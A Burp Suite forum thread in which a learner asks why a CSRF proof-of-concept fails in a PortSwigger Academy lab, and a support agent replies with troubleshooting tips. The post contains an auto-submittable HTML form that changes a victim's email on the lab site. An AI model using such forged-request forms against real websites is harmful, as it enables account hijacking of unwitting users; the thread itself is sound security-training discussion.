Burp Suite User Forum

Create new post

CSRF Poc Doesn't work in Portswigger's Labs.

Ab | Last updated: Jan 23, 2023 11:41AM UTC

Hi, I've done some labs in the Academeny and I some are easy to understand and solve, However, the CSRF section doesn't work for me. I have created PoC for the First CSRF Lab titled: "CSRF vulnerability with no defenses" PoC: <html> <body> <form method="POST" action="https://0a7b0052033aa998c073227300da008d.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="fwafwa2f%40gmail.com"/> <input type="submit" value="Submit"> </form> </body> <html> However this doesn't work, neither if I run it on a local html file or on the exploit server. I tested other Labs and non seem to work for me. I understand the CSRF Concept I just can't seem to get it the labs solved. I have samesite protection disabled in firefox (about:config), I tried to use other browsers and it won't work. Please help! Thanks.

Ab | Last updated: Jan 23, 2023 11:44AM UTC

I know I will have to add the <script> document.forms[0].submit(); </script> so the page runs automaticly this don't work eaither, I just wanted to test it out manualy first, but yeah. the email never get's changed. I can change the email using repeater, but not The PoC

Hannah, PortSwigger Agent | Last updated: Jan 23, 2023 02:03PM UTC

Hi Have you tried doing this in Burp's inbuilt Chromium browser? Have you watched any of the community solutions as a video guide for the lab?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.